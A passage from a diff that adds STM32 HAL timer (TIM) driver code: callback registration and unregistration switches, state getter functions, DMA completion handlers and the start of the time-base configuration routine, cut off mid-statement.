HAL_TIM_OC_MSPDEINIT_CB_ID : + htim->OC_MspDeInitCallback = pCallback; + break; + + case HAL_TIM_PWM_MSPINIT_CB_ID : + htim->PWM_MspInitCallback = pCallback; + break; + + case HAL_TIM_PWM_MSPDEINIT_CB_ID : + htim->PWM_MspDeInitCallback = pCallback; + break; + + case HAL_TIM_ONE_PULSE_MSPINIT_CB_ID : + htim->OnePulse_MspInitCallback = pCallback; + break; + + case HAL_TIM_ONE_PULSE_MSPDEINIT_CB_ID : + htim->OnePulse_MspDeInitCallback = pCallback; + break; + + case HAL_TIM_ENCODER_MSPINIT_CB_ID : + htim->Encoder_MspInitCallback = pCallback; + break; + + case HAL_TIM_ENCODER_MSPDEINIT_CB_ID : + htim->Encoder_MspDeInitCallback = pCallback; + break; + + case HAL_TIM_HALL_SENSOR_MSPINIT_CB_ID : + htim->HallSensor_MspInitCallback = pCallback; + break; + + case HAL_TIM_HALL_SENSOR_MSPDEINIT_CB_ID : + htim->HallSensor_MspDeInitCallback = pCallback; + break; + + case HAL_TIM_PERIOD_ELAPSED_CB_ID : + htim->PeriodElapsedCallback = pCallback; + break; + + case HAL_TIM_PERIOD_ELAPSED_HALF_CB_ID : + htim->PeriodElapsedHalfCpltCallback = pCallback; + break; + + case HAL_TIM_TRIGGER_CB_ID : + htim->TriggerCallback = pCallback; + break; + + case HAL_TIM_TRIGGER_HALF_CB_ID : + htim->TriggerHalfCpltCallback = pCallback; + break; + + case HAL_TIM_IC_CAPTURE_CB_ID : + htim->IC_CaptureCallback = pCallback; + break; + + case HAL_TIM_IC_CAPTURE_HALF_CB_ID : + htim->IC_CaptureHalfCpltCallback = pCallback; + break; + + case HAL_TIM_OC_DELAY_ELAPSED_CB_ID : + htim->OC_DelayElapsedCallback = pCallback; + break; + + case HAL_TIM_PWM_PULSE_FINISHED_CB_ID : + htim->PWM_PulseFinishedCallback = pCallback; + break; + + case HAL_TIM_PWM_PULSE_FINISHED_HALF_CB_ID : + htim->PWM_PulseFinishedHalfCpltCallback = pCallback; + break; + + case HAL_TIM_ERROR_CB_ID : + htim->ErrorCallback = pCallback; + break; + + case HAL_TIM_COMMUTATION_CB_ID : + htim->CommutationCallback = pCallback; + break; + + case HAL_TIM_COMMUTATION_HALF_CB_ID : + htim->CommutationHalfCpltCallback = pCallback; + break; + + case HAL_TIM_BREAK_CB_ID : + htim->BreakCallback = pCallback; + break; + + default : + /* Return error status */ + status = HAL_ERROR; + break; + } + } + else if (htim->State == HAL_TIM_STATE_RESET) + { + switch (CallbackID) + { + case HAL_TIM_BASE_MSPINIT_CB_ID : + htim->Base_MspInitCallback = pCallback; + break; + + case HAL_TIM_BASE_MSPDEINIT_CB_ID : + htim->Base_MspDeInitCallback = pCallback; + break; + + case HAL_TIM_IC_MSPINIT_CB_ID : + htim->IC_MspInitCallback = pCallback; + break; + + case HAL_TIM_IC_MSPDEINIT_CB_ID : + htim->IC_MspDeInitCallback = pCallback; + break; + + case HAL_TIM_OC_MSPINIT_CB_ID : + htim->OC_MspInitCallback = pCallback; + break; + + case HAL_TIM_OC_MSPDEINIT_CB_ID : + htim->OC_MspDeInitCallback = pCallback; + break; + + case HAL_TIM_PWM_MSPINIT_CB_ID : + htim->PWM_MspInitCallback = pCallback; + break; + + case HAL_TIM_PWM_MSPDEINIT_CB_ID : + htim->PWM_MspDeInitCallback = pCallback; + break; + + case HAL_TIM_ONE_PULSE_MSPINIT_CB_ID : + htim->OnePulse_MspInitCallback = pCallback; + break; + + case HAL_TIM_ONE_PULSE_MSPDEINIT_CB_ID : + htim->OnePulse_MspDeInitCallback = pCallback; + break; + + case HAL_TIM_ENCODER_MSPINIT_CB_ID : + htim->Encoder_MspInitCallback = pCallback; + break; + + case HAL_TIM_ENCODER_MSPDEINIT_CB_ID : + htim->Encoder_MspDeInitCallback = pCallback; + break; + + case HAL_TIM_HALL_SENSOR_MSPINIT_CB_ID : + htim->HallSensor_MspInitCallback = pCallback; + break; + + case HAL_TIM_HALL_SENSOR_MSPDEINIT_CB_ID : + htim->HallSensor_MspDeInitCallback = pCallback; + break; + + default : + /* Return error status */ + status = HAL_ERROR; + break; + } + } + else + { + /* Return error status */ + status = HAL_ERROR; + } + + /* Release Lock */ + __HAL_UNLOCK(htim); + + return status; +} + +/** + * @brief Unregister a TIM callback + * TIM callback is redirected to the weak predefined callback + * @param htim tim handle + * @param CallbackID ID of the callback to be unregistered + * This parameter can be one of the following values: + * @arg @ref HAL_TIM_BASE_MSPINIT_CB_ID Base MspInit Callback ID + * @arg @ref HAL_TIM_BASE_MSPDEINIT_CB_ID Base MspDeInit Callback ID + * @arg @ref HAL_TIM_IC_MSPINIT_CB_ID IC MspInit Callback ID + * @arg @ref HAL_TIM_IC_MSPDEINIT_CB_ID IC MspDeInit Callback ID + * @arg @ref HAL_TIM_OC_MSPINIT_CB_ID OC MspInit Callback ID + * @arg @ref HAL_TIM_OC_MSPDEINIT_CB_ID OC MspDeInit Callback ID + * @arg @ref HAL_TIM_PWM_MSPINIT_CB_ID PWM MspInit Callback ID + * @arg @ref HAL_TIM_PWM_MSPDEINIT_CB_ID PWM MspDeInit Callback ID + * @arg @ref HAL_TIM_ONE_PULSE_MSPINIT_CB_ID One Pulse MspInit Callback ID + * @arg @ref HAL_TIM_ONE_PULSE_MSPDEINIT_CB_ID One Pulse MspDeInit Callback ID + * @arg @ref HAL_TIM_ENCODER_MSPINIT_CB_ID Encoder MspInit Callback ID + * @arg @ref HAL_TIM_ENCODER_MSPDEINIT_CB_ID Encoder MspDeInit Callback ID + * @arg @ref HAL_TIM_HALL_SENSOR_MSPINIT_CB_ID Hall Sensor MspInit Callback ID + * @arg @ref HAL_TIM_HALL_SENSOR_MSPDEINIT_CB_ID Hall Sensor MspDeInit Callback ID + * @arg @ref HAL_TIM_PERIOD_ELAPSED_CB_ID Period Elapsed Callback ID + * @arg @ref HAL_TIM_PERIOD_ELAPSED_HALF_CB_ID Period Elapsed half complete Callback ID + * @arg @ref HAL_TIM_TRIGGER_CB_ID Trigger Callback ID + * @arg @ref HAL_TIM_TRIGGER_HALF_CB_ID Trigger half complete Callback ID + * @arg @ref HAL_TIM_IC_CAPTURE_CB_ID Input Capture Callback ID + * @arg @ref HAL_TIM_IC_CAPTURE_HALF_CB_ID Input Capture half complete Callback ID + * @arg @ref HAL_TIM_OC_DELAY_ELAPSED_CB_ID Output Compare Delay Elapsed Callback ID + * @arg @ref HAL_TIM_PWM_PULSE_FINISHED_CB_ID PWM Pulse Finished Callback ID + * @arg @ref HAL_TIM_PWM_PULSE_FINISHED_HALF_CB_ID PWM Pulse Finished half complete Callback ID + * @arg @ref HAL_TIM_ERROR_CB_ID Error Callback ID + * @arg @ref HAL_TIM_COMMUTATION_CB_ID Commutation Callback ID + * @arg @ref HAL_TIM_COMMUTATION_HALF_CB_ID Commutation half complete Callback ID + * @arg @ref HAL_TIM_BREAK_CB_ID Break Callback ID + * @retval status + */ +HAL_StatusTypeDef HAL_TIM_UnRegisterCallback(TIM_HandleTypeDef *htim, HAL_TIM_CallbackIDTypeDef CallbackID) +{ + HAL_StatusTypeDef status = HAL_OK; + + /* Process locked */ + __HAL_LOCK(htim); + + if (htim->State == HAL_TIM_STATE_READY) + { + switch (CallbackID) + { + case HAL_TIM_BASE_MSPINIT_CB_ID : + /* Legacy weak Base MspInit Callback */ + htim->Base_MspInitCallback = HAL_TIM_Base_MspInit; + break; + + case HAL_TIM_BASE_MSPDEINIT_CB_ID : + /* Legacy weak Base Msp DeInit Callback */ + htim->Base_MspDeInitCallback = HAL_TIM_Base_MspDeInit; + break; + + case HAL_TIM_IC_MSPINIT_CB_ID : + /* Legacy weak IC Msp Init Callback */ + htim->IC_MspInitCallback = HAL_TIM_IC_MspInit; + break; + + case HAL_TIM_IC_MSPDEINIT_CB_ID : + /* Legacy weak IC Msp DeInit Callback */ + htim->IC_MspDeInitCallback = HAL_TIM_IC_MspDeInit; + break; + + case HAL_TIM_OC_MSPINIT_CB_ID : + /* Legacy weak OC Msp Init Callback */ + htim->OC_MspInitCallback = HAL_TIM_OC_MspInit; + break; + + case HAL_TIM_OC_MSPDEINIT_CB_ID : + /* Legacy weak OC Msp DeInit Callback */ + htim->OC_MspDeInitCallback = HAL_TIM_OC_MspDeInit; + break; + + case HAL_TIM_PWM_MSPINIT_CB_ID : + /* Legacy weak PWM Msp Init Callback */ + htim->PWM_MspInitCallback = HAL_TIM_PWM_MspInit; + break; + + case HAL_TIM_PWM_MSPDEINIT_CB_ID : + /* Legacy weak PWM Msp DeInit Callback */ + htim->PWM_MspDeInitCallback = HAL_TIM_PWM_MspDeInit; + break; + + case HAL_TIM_ONE_PULSE_MSPINIT_CB_ID : + /* Legacy weak One Pulse Msp Init Callback */ + htim->OnePulse_MspInitCallback = HAL_TIM_OnePulse_MspInit; + break; + + case HAL_TIM_ONE_PULSE_MSPDEINIT_CB_ID : + /* Legacy weak One Pulse Msp DeInit Callback */ + htim->OnePulse_MspDeInitCallback = HAL_TIM_OnePulse_MspDeInit; + break; + + case HAL_TIM_ENCODER_MSPINIT_CB_ID : + /* Legacy weak Encoder Msp Init Callback */ + htim->Encoder_MspInitCallback = HAL_TIM_Encoder_MspInit; + break; + + case HAL_TIM_ENCODER_MSPDEINIT_CB_ID : + /* Legacy weak Encoder Msp DeInit Callback */ + htim->Encoder_MspDeInitCallback = HAL_TIM_Encoder_MspDeInit; + break; + + case HAL_TIM_HALL_SENSOR_MSPINIT_CB_ID : + /* Legacy weak Hall Sensor Msp Init Callback */ + htim->HallSensor_MspInitCallback = HAL_TIMEx_HallSensor_MspInit; + break; + + case HAL_TIM_HALL_SENSOR_MSPDEINIT_CB_ID : + /* Legacy weak Hall Sensor Msp DeInit Callback */ + htim->HallSensor_MspDeInitCallback = HAL_TIMEx_HallSensor_MspDeInit; + break; + + case HAL_TIM_PERIOD_ELAPSED_CB_ID : + /* Legacy weak Period Elapsed Callback */ + htim->PeriodElapsedCallback = HAL_TIM_PeriodElapsedCallback; + break; + + case HAL_TIM_PERIOD_ELAPSED_HALF_CB_ID : + /* Legacy weak Period Elapsed half complete Callback */ + htim->PeriodElapsedHalfCpltCallback = HAL_TIM_PeriodElapsedHalfCpltCallback; + break; + + case HAL_TIM_TRIGGER_CB_ID : + /* Legacy weak Trigger Callback */ + htim->TriggerCallback = HAL_TIM_TriggerCallback; + break; + + case HAL_TIM_TRIGGER_HALF_CB_ID : + /* Legacy weak Trigger half complete Callback */ + htim->TriggerHalfCpltCallback = HAL_TIM_TriggerHalfCpltCallback; + break; + + case HAL_TIM_IC_CAPTURE_CB_ID : + /* Legacy weak IC Capture Callback */ + htim->IC_CaptureCallback = HAL_TIM_IC_CaptureCallback; + break; + + case HAL_TIM_IC_CAPTURE_HALF_CB_ID : + /* Legacy weak IC Capture half complete Callback */ + htim->IC_CaptureHalfCpltCallback = HAL_TIM_IC_CaptureHalfCpltCallback; + break; + + case HAL_TIM_OC_DELAY_ELAPSED_CB_ID : + /* Legacy weak OC Delay Elapsed Callback */ + htim->OC_DelayElapsedCallback = HAL_TIM_OC_DelayElapsedCallback; + break; + + case HAL_TIM_PWM_PULSE_FINISHED_CB_ID : + /* Legacy weak PWM Pulse Finished Callback */ + htim->PWM_PulseFinishedCallback = HAL_TIM_PWM_PulseFinishedCallback; + break; + + case HAL_TIM_PWM_PULSE_FINISHED_HALF_CB_ID : + /* Legacy weak PWM Pulse Finished half complete Callback */ + htim->PWM_PulseFinishedHalfCpltCallback = HAL_TIM_PWM_PulseFinishedHalfCpltCallback; + break; + + case HAL_TIM_ERROR_CB_ID : + /* Legacy weak Error Callback */ + htim->ErrorCallback = HAL_TIM_ErrorCallback; + break; + + case HAL_TIM_COMMUTATION_CB_ID : + /* Legacy weak Commutation Callback */ + htim->CommutationCallback = HAL_TIMEx_CommutCallback; + break; + + case HAL_TIM_COMMUTATION_HALF_CB_ID : + /* Legacy weak Commutation half complete Callback */ + htim->CommutationHalfCpltCallback = HAL_TIMEx_CommutHalfCpltCallback; + break; + + case HAL_TIM_BREAK_CB_ID : + /* Legacy weak Break Callback */ + htim->BreakCallback = HAL_TIMEx_BreakCallback; + break; + + default : + /* Return error status */ + status = HAL_ERROR; + break; + } + } + else if (htim->State == HAL_TIM_STATE_RESET) + { + switch (CallbackID) + { + case HAL_TIM_BASE_MSPINIT_CB_ID : + /* Legacy weak Base MspInit Callback */ + htim->Base_MspInitCallback = HAL_TIM_Base_MspInit; + break; + + case HAL_TIM_BASE_MSPDEINIT_CB_ID : + /* Legacy weak Base Msp DeInit Callback */ + htim->Base_MspDeInitCallback = HAL_TIM_Base_MspDeInit; + break; + + case HAL_TIM_IC_MSPINIT_CB_ID : + /* Legacy weak IC Msp Init Callback */ + htim->IC_MspInitCallback = HAL_TIM_IC_MspInit; + break; + + case HAL_TIM_IC_MSPDEINIT_CB_ID : + /* Legacy weak IC Msp DeInit Callback */ + htim->IC_MspDeInitCallback = HAL_TIM_IC_MspDeInit; + break; + + case HAL_TIM_OC_MSPINIT_CB_ID : + /* Legacy weak OC Msp Init Callback */ + htim->OC_MspInitCallback = HAL_TIM_OC_MspInit; + break; + + case HAL_TIM_OC_MSPDEINIT_CB_ID : + /* Legacy weak OC Msp DeInit Callback */ + htim->OC_MspDeInitCallback = HAL_TIM_OC_MspDeInit; + break; + + case HAL_TIM_PWM_MSPINIT_CB_ID : + /* Legacy weak PWM Msp Init Callback */ + htim->PWM_MspInitCallback = HAL_TIM_PWM_MspInit; + break; + + case HAL_TIM_PWM_MSPDEINIT_CB_ID : + /* Legacy weak PWM Msp DeInit Callback */ + htim->PWM_MspDeInitCallback = HAL_TIM_PWM_MspDeInit; + break; + + case HAL_TIM_ONE_PULSE_MSPINIT_CB_ID : + /* Legacy weak One Pulse Msp Init Callback */ + htim->OnePulse_MspInitCallback = HAL_TIM_OnePulse_MspInit; + break; + + case HAL_TIM_ONE_PULSE_MSPDEINIT_CB_ID : + /* Legacy weak One Pulse Msp DeInit Callback */ + htim->OnePulse_MspDeInitCallback = HAL_TIM_OnePulse_MspDeInit; + break; + + case HAL_TIM_ENCODER_MSPINIT_CB_ID : + /* Legacy weak Encoder Msp Init Callback */ + htim->Encoder_MspInitCallback = HAL_TIM_Encoder_MspInit; + break; + + case HAL_TIM_ENCODER_MSPDEINIT_CB_ID : + /* Legacy weak Encoder Msp DeInit Callback */ + htim->Encoder_MspDeInitCallback = HAL_TIM_Encoder_MspDeInit; + break; + + case HAL_TIM_HALL_SENSOR_MSPINIT_CB_ID : + /* Legacy weak Hall Sensor Msp Init Callback */ + htim->HallSensor_MspInitCallback = HAL_TIMEx_HallSensor_MspInit; + break; + + case HAL_TIM_HALL_SENSOR_MSPDEINIT_CB_ID : + /* Legacy weak Hall Sensor Msp DeInit Callback */ + htim->HallSensor_MspDeInitCallback = HAL_TIMEx_HallSensor_MspDeInit; + break; + + default : + /* Return error status */ + status = HAL_ERROR; + break; + } + } + else + { + /* Return error status */ + status = HAL_ERROR; + } + + /* Release Lock */ + __HAL_UNLOCK(htim); + + return status; +} +#endif /* USE_HAL_TIM_REGISTER_CALLBACKS */ + +/** + * @} + */ + +/** @defgroup TIM_Exported_Functions_Group10 TIM Peripheral State functions + * @brief TIM Peripheral State functions + * +@verbatim + ============================================================================== + ##### Peripheral State functions ##### + ============================================================================== + [..] + This subsection permits to get in run-time the status of the peripheral + and the data flow. + +@endverbatim + * @{ + */ + +/** + * @brief Return the TIM Base handle state. + * @param htim TIM Base handle + * @retval HAL state + */ +HAL_TIM_StateTypeDef HAL_TIM_Base_GetState(TIM_HandleTypeDef *htim) +{ + return htim->State; +} + +/** + * @brief Return the TIM OC handle state. + * @param htim TIM Output Compare handle + * @retval HAL state + */ +HAL_TIM_StateTypeDef HAL_TIM_OC_GetState(TIM_HandleTypeDef *htim) +{ + return htim->State; +} + +/** + * @brief Return the TIM PWM handle state. + * @param htim TIM handle + * @retval HAL state + */ +HAL_TIM_StateTypeDef HAL_TIM_PWM_GetState(TIM_HandleTypeDef *htim) +{ + return htim->State; +} + +/** + * @brief Return the TIM Input Capture handle state. + * @param htim TIM IC handle + * @retval HAL state + */ +HAL_TIM_StateTypeDef HAL_TIM_IC_GetState(TIM_HandleTypeDef *htim) +{ + return htim->State; +} + +/** + * @brief Return the TIM One Pulse Mode handle state. + * @param htim TIM OPM handle + * @retval HAL state + */ +HAL_TIM_StateTypeDef HAL_TIM_OnePulse_GetState(TIM_HandleTypeDef *htim) +{ + return htim->State; +} + +/** + * @brief Return the TIM Encoder Mode handle state. + * @param htim TIM Encoder Interface handle + * @retval HAL state + */ +HAL_TIM_StateTypeDef HAL_TIM_Encoder_GetState(TIM_HandleTypeDef *htim) +{ + return htim->State; +} + +/** + * @brief Return the TIM Encoder Mode handle state. + * @param htim TIM handle + * @retval Active channel + */ +HAL_TIM_ActiveChannel HAL_TIM_GetActiveChannel(TIM_HandleTypeDef *htim) +{ + return htim->Channel; +} + +/** + * @brief Return actual state of the TIM channel. + * @param htim TIM handle + * @param Channel TIM Channel + * This parameter can be one of the following values: + * @arg TIM_CHANNEL_1: TIM Channel 1 + * @arg TIM_CHANNEL_2: TIM Channel 2 + * @arg TIM_CHANNEL_3: TIM Channel 3 + * @arg TIM_CHANNEL_4: TIM Channel 4 + * @arg TIM_CHANNEL_5: TIM Channel 5 + * @arg TIM_CHANNEL_6: TIM Channel 6 + * @retval TIM Channel state + */ +HAL_TIM_ChannelStateTypeDef HAL_TIM_GetChannelState(TIM_HandleTypeDef *htim, uint32_t Channel) +{ + HAL_TIM_ChannelStateTypeDef channel_state; + + /* Check the parameters */ + assert_param(IS_TIM_CCX_INSTANCE(htim->Instance, Channel)); + + channel_state = TIM_CHANNEL_STATE_GET(htim, Channel); + + return channel_state; +} + +/** + * @brief Return actual state of a DMA burst operation. + * @param htim TIM handle + * @retval DMA burst state + */ +HAL_TIM_DMABurstStateTypeDef HAL_TIM_DMABurstState(TIM_HandleTypeDef *htim) +{ + /* Check the parameters */ + assert_param(IS_TIM_DMABURST_INSTANCE(htim->Instance)); + + return htim->DMABurstState; +} + +/** + * @} + */ + +/** + * @} + */ + +/** @defgroup TIM_Private_Functions TIM Private Functions + * @{ + */ + +/** + * @brief TIM DMA error callback + * @param hdma pointer to DMA handle. + * @retval None + */ +void TIM_DMAError(DMA_HandleTypeDef *hdma) +{ + TIM_HandleTypeDef *htim = (TIM_HandleTypeDef *)((DMA_HandleTypeDef *)hdma)->Parent; + + if (hdma == htim->hdma[TIM_DMA_ID_CC1]) + { + htim->Channel = HAL_TIM_ACTIVE_CHANNEL_1; + TIM_CHANNEL_STATE_SET(htim, TIM_CHANNEL_1, HAL_TIM_CHANNEL_STATE_READY); + } + else if (hdma == htim->hdma[TIM_DMA_ID_CC2]) + { + htim->Channel = HAL_TIM_ACTIVE_CHANNEL_2; + TIM_CHANNEL_STATE_SET(htim, TIM_CHANNEL_2, HAL_TIM_CHANNEL_STATE_READY); + } + else if (hdma == htim->hdma[TIM_DMA_ID_CC3]) + { + htim->Channel = HAL_TIM_ACTIVE_CHANNEL_3; + TIM_CHANNEL_STATE_SET(htim, TIM_CHANNEL_3, HAL_TIM_CHANNEL_STATE_READY); + } + else if (hdma == htim->hdma[TIM_DMA_ID_CC4]) + { + htim->Channel = HAL_TIM_ACTIVE_CHANNEL_4; + TIM_CHANNEL_STATE_SET(htim, TIM_CHANNEL_4, HAL_TIM_CHANNEL_STATE_READY); + } + else + { + htim->State = HAL_TIM_STATE_READY; + } + +#if (USE_HAL_TIM_REGISTER_CALLBACKS == 1) + htim->ErrorCallback(htim); +#else + HAL_TIM_ErrorCallback(htim); +#endif /* USE_HAL_TIM_REGISTER_CALLBACKS */ + + htim->Channel = HAL_TIM_ACTIVE_CHANNEL_CLEARED; +} + +/** + * @brief TIM DMA Delay Pulse complete callback. + * @param hdma pointer to DMA handle. + * @retval None + */ +static void TIM_DMADelayPulseCplt(DMA_HandleTypeDef *hdma) +{ + TIM_HandleTypeDef *htim = (TIM_HandleTypeDef *)((DMA_HandleTypeDef *)hdma)->Parent; + + if (hdma == htim->hdma[TIM_DMA_ID_CC1]) + { + htim->Channel = HAL_TIM_ACTIVE_CHANNEL_1; + + if (hdma->Init.Mode == DMA_NORMAL) + { + TIM_CHANNEL_STATE_SET(htim, TIM_CHANNEL_1, HAL_TIM_CHANNEL_STATE_READY); + } + } + else if (hdma == htim->hdma[TIM_DMA_ID_CC2]) + { + htim->Channel = HAL_TIM_ACTIVE_CHANNEL_2; + + if (hdma->Init.Mode == DMA_NORMAL) + { + TIM_CHANNEL_STATE_SET(htim, TIM_CHANNEL_2, HAL_TIM_CHANNEL_STATE_READY); + } + } + else if (hdma == htim->hdma[TIM_DMA_ID_CC3]) + { + htim->Channel = HAL_TIM_ACTIVE_CHANNEL_3; + + if (hdma->Init.Mode == DMA_NORMAL) + { + TIM_CHANNEL_STATE_SET(htim, TIM_CHANNEL_3, HAL_TIM_CHANNEL_STATE_READY); + } + } + else if (hdma == htim->hdma[TIM_DMA_ID_CC4]) + { + htim->Channel = HAL_TIM_ACTIVE_CHANNEL_4; + + if (hdma->Init.Mode == DMA_NORMAL) + { + TIM_CHANNEL_STATE_SET(htim, TIM_CHANNEL_4, HAL_TIM_CHANNEL_STATE_READY); + } + } + else + { + /* nothing to do */ + } + +#if (USE_HAL_TIM_REGISTER_CALLBACKS == 1) + htim->PWM_PulseFinishedCallback(htim); +#else + HAL_TIM_PWM_PulseFinishedCallback(htim); +#endif /* USE_HAL_TIM_REGISTER_CALLBACKS */ + + htim->Channel = HAL_TIM_ACTIVE_CHANNEL_CLEARED; +} + +/** + * @brief TIM DMA Delay Pulse half complete callback. + * @param hdma pointer to DMA handle. + * @retval None + */ +void TIM_DMADelayPulseHalfCplt(DMA_HandleTypeDef *hdma) +{ + TIM_HandleTypeDef *htim = (TIM_HandleTypeDef *)((DMA_HandleTypeDef *)hdma)->Parent; + + if (hdma == htim->hdma[TIM_DMA_ID_CC1]) + { + htim->Channel = HAL_TIM_ACTIVE_CHANNEL_1; + } + else if (hdma == htim->hdma[TIM_DMA_ID_CC2]) + { + htim->Channel = HAL_TIM_ACTIVE_CHANNEL_2; + } + else if (hdma == htim->hdma[TIM_DMA_ID_CC3]) + { + htim->Channel = HAL_TIM_ACTIVE_CHANNEL_3; + } + else if (hdma == htim->hdma[TIM_DMA_ID_CC4]) + { + htim->Channel = HAL_TIM_ACTIVE_CHANNEL_4; + } + else + { + /* nothing to do */ + } + +#if (USE_HAL_TIM_REGISTER_CALLBACKS == 1) + htim->PWM_PulseFinishedHalfCpltCallback(htim); +#else + HAL_TIM_PWM_PulseFinishedHalfCpltCallback(htim); +#endif /* USE_HAL_TIM_REGISTER_CALLBACKS */ + + htim->Channel = HAL_TIM_ACTIVE_CHANNEL_CLEARED; +} + +/** + * @brief TIM DMA Capture complete callback. + * @param hdma pointer to DMA handle. + * @retval None + */ +void TIM_DMACaptureCplt(DMA_HandleTypeDef *hdma) +{ + TIM_HandleTypeDef *htim = (TIM_HandleTypeDef *)((DMA_HandleTypeDef *)hdma)->Parent; + + if (hdma == htim->hdma[TIM_DMA_ID_CC1]) + { + htim->Channel = HAL_TIM_ACTIVE_CHANNEL_1; + + if (hdma->Init.Mode == DMA_NORMAL) + { + TIM_CHANNEL_STATE_SET(htim, TIM_CHANNEL_1, HAL_TIM_CHANNEL_STATE_READY); + TIM_CHANNEL_N_STATE_SET(htim, TIM_CHANNEL_1, HAL_TIM_CHANNEL_STATE_READY); + } + } + else if (hdma == htim->hdma[TIM_DMA_ID_CC2]) + { + htim->Channel = HAL_TIM_ACTIVE_CHANNEL_2; + + if (hdma->Init.Mode == DMA_NORMAL) + { + TIM_CHANNEL_STATE_SET(htim, TIM_CHANNEL_2, HAL_TIM_CHANNEL_STATE_READY); + TIM_CHANNEL_N_STATE_SET(htim, TIM_CHANNEL_2, HAL_TIM_CHANNEL_STATE_READY); + } + } + else if (hdma == htim->hdma[TIM_DMA_ID_CC3]) + { + htim->Channel = HAL_TIM_ACTIVE_CHANNEL_3; + + if (hdma->Init.Mode == DMA_NORMAL) + { + TIM_CHANNEL_STATE_SET(htim, TIM_CHANNEL_3, HAL_TIM_CHANNEL_STATE_READY); + TIM_CHANNEL_N_STATE_SET(htim, TIM_CHANNEL_3, HAL_TIM_CHANNEL_STATE_READY); + } + } + else if (hdma == htim->hdma[TIM_DMA_ID_CC4]) + { + htim->Channel = HAL_TIM_ACTIVE_CHANNEL_4; + + if (hdma->Init.Mode == DMA_NORMAL) + { + TIM_CHANNEL_STATE_SET(htim, TIM_CHANNEL_4, HAL_TIM_CHANNEL_STATE_READY); + TIM_CHANNEL_N_STATE_SET(htim, TIM_CHANNEL_4, HAL_TIM_CHANNEL_STATE_READY); + } + } + else + { + /* nothing to do */ + } + +#if (USE_HAL_TIM_REGISTER_CALLBACKS == 1) + htim->IC_CaptureCallback(htim); +#else + HAL_TIM_IC_CaptureCallback(htim); +#endif /* USE_HAL_TIM_REGISTER_CALLBACKS */ + + htim->Channel = HAL_TIM_ACTIVE_CHANNEL_CLEARED; +} + +/** + * @brief TIM DMA Capture half complete callback. + * @param hdma pointer to DMA handle. + * @retval None + */ +void TIM_DMACaptureHalfCplt(DMA_HandleTypeDef *hdma) +{ + TIM_HandleTypeDef *htim = (TIM_HandleTypeDef *)((DMA_HandleTypeDef *)hdma)->Parent; + + if (hdma == htim->hdma[TIM_DMA_ID_CC1]) + { + htim->Channel = HAL_TIM_ACTIVE_CHANNEL_1; + } + else if (hdma == htim->hdma[TIM_DMA_ID_CC2]) + { + htim->Channel = HAL_TIM_ACTIVE_CHANNEL_2; + } + else if (hdma == htim->hdma[TIM_DMA_ID_CC3]) + { + htim->Channel = HAL_TIM_ACTIVE_CHANNEL_3; + } + else if (hdma == htim->hdma[TIM_DMA_ID_CC4]) + { + htim->Channel = HAL_TIM_ACTIVE_CHANNEL_4; + } + else + { + /* nothing to do */ + } + +#if (USE_HAL_TIM_REGISTER_CALLBACKS == 1) + htim->IC_CaptureHalfCpltCallback(htim); +#else + HAL_TIM_IC_CaptureHalfCpltCallback(htim); +#endif /* USE_HAL_TIM_REGISTER_CALLBACKS */ + + htim->Channel = HAL_TIM_ACTIVE_CHANNEL_CLEARED; +} + +/** + * @brief TIM DMA Period Elapse complete callback. + * @param hdma pointer to DMA handle. + * @retval None + */ +static void TIM_DMAPeriodElapsedCplt(DMA_HandleTypeDef *hdma) +{ + TIM_HandleTypeDef *htim = (TIM_HandleTypeDef *)((DMA_HandleTypeDef *)hdma)->Parent; + + if (htim->hdma[TIM_DMA_ID_UPDATE]->Init.Mode == DMA_NORMAL) + { + htim->State = HAL_TIM_STATE_READY; + } + +#if (USE_HAL_TIM_REGISTER_CALLBACKS == 1) + htim->PeriodElapsedCallback(htim); +#else + HAL_TIM_PeriodElapsedCallback(htim); +#endif /* USE_HAL_TIM_REGISTER_CALLBACKS */ +} + +/** + * @brief TIM DMA Period Elapse half complete callback. + * @param hdma pointer to DMA handle. + * @retval None + */ +static void TIM_DMAPeriodElapsedHalfCplt(DMA_HandleTypeDef *hdma) +{ + TIM_HandleTypeDef *htim = (TIM_HandleTypeDef *)((DMA_HandleTypeDef *)hdma)->Parent; + +#if (USE_HAL_TIM_REGISTER_CALLBACKS == 1) + htim->PeriodElapsedHalfCpltCallback(htim); +#else + HAL_TIM_PeriodElapsedHalfCpltCallback(htim); +#endif /* USE_HAL_TIM_REGISTER_CALLBACKS */ +} + +/** + * @brief TIM DMA Trigger callback. + * @param hdma pointer to DMA handle. + * @retval None + */ +static void TIM_DMATriggerCplt(DMA_HandleTypeDef *hdma) +{ + TIM_HandleTypeDef *htim = (TIM_HandleTypeDef *)((DMA_HandleTypeDef *)hdma)->Parent; + + if (htim->hdma[TIM_DMA_ID_TRIGGER]->Init.Mode == DMA_NORMAL) + { + htim->State = HAL_TIM_STATE_READY; + } + +#if (USE_HAL_TIM_REGISTER_CALLBACKS == 1) + htim->TriggerCallback(htim); +#else + HAL_TIM_TriggerCallback(htim); +#endif /* USE_HAL_TIM_REGISTER_CALLBACKS */ +} + +/** + * @brief TIM DMA Trigger half complete callback. + * @param hdma pointer to DMA handle. + * @retval None + */ +static void TIM_DMATriggerHalfCplt(DMA_HandleTypeDef *hdma) +{ + TIM_HandleTypeDef *htim = (TIM_HandleTypeDef *)((DMA_HandleTypeDef *)hdma)->Parent; + +#if (USE_HAL_TIM_REGISTER_CALLBACKS == 1) + htim->TriggerHalfCpltCallback(htim); +#else + HAL_TIM_TriggerHalfCpltCallback(htim); +#endif /* USE_HAL_TIM_REGISTER_CALLBACKS */ +} + +/** + * @brief Time Base configuration + * @param TIMx TIM peripheral + * @param Structure TIM Base configuration structure + * @retval None + */ +void TIM_Base_SetConfig(TIM_TypeDef *TIMx, TIM_Base_InitTypeDef *Structure) +{ + uint32_t tmpcr1; + tmpcr1 = TIMx->CR1; + + /* Set TIM Time Base Unit parameters ---------------------------------------*/ + if (IS_TIM_COUNTER_MODE_SELECT_INSTANCE(TIMx)) + { + /* Select the Counter Mode */ + tmpcr1 &= ~(TIM_CR1_DIR | TIM_CR1_CMS); + tmpcr1 |= Structure->CounterMode; + } + + if (IS_TIM_CLOCK_DIVISION_INSTANCE(TIMx)) + { + /* Set the clock division */ + tmpcr1 &= ~TIM_CR1_CKD; + tmpcr1 |= (uint32_t)Structure->ClockDivision; + } + + /* Set the auto-reload preload */ + MODIFY_REG(tmpcr1, TIM_CR1_ARPE, Structure->AutoReloadPreload); + + TIMx->CR1 = tmpcr1; + + /* Set the Autoreload value */ + TIMx->ARR = (uint32_t)Structure->Period ; + + /* Set the Prescaler value */ + TIMx->PSC = 